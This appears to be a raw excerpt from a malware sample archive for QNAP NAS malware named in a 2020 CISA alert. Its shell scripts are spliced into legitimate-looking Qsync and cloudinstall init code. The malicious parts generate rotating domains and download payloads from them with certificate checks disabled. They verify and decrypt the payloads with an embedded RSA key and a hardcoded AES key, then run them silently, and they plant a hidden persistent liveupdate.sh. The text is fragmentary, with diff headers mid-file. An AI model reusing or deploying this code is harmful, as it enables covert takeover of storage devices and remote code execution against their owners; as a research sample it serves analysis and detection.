0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
568
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
Normal file
568
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
Normal file
@ -0,0 +1,568 @@
|
||||
#!/bin/sh
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
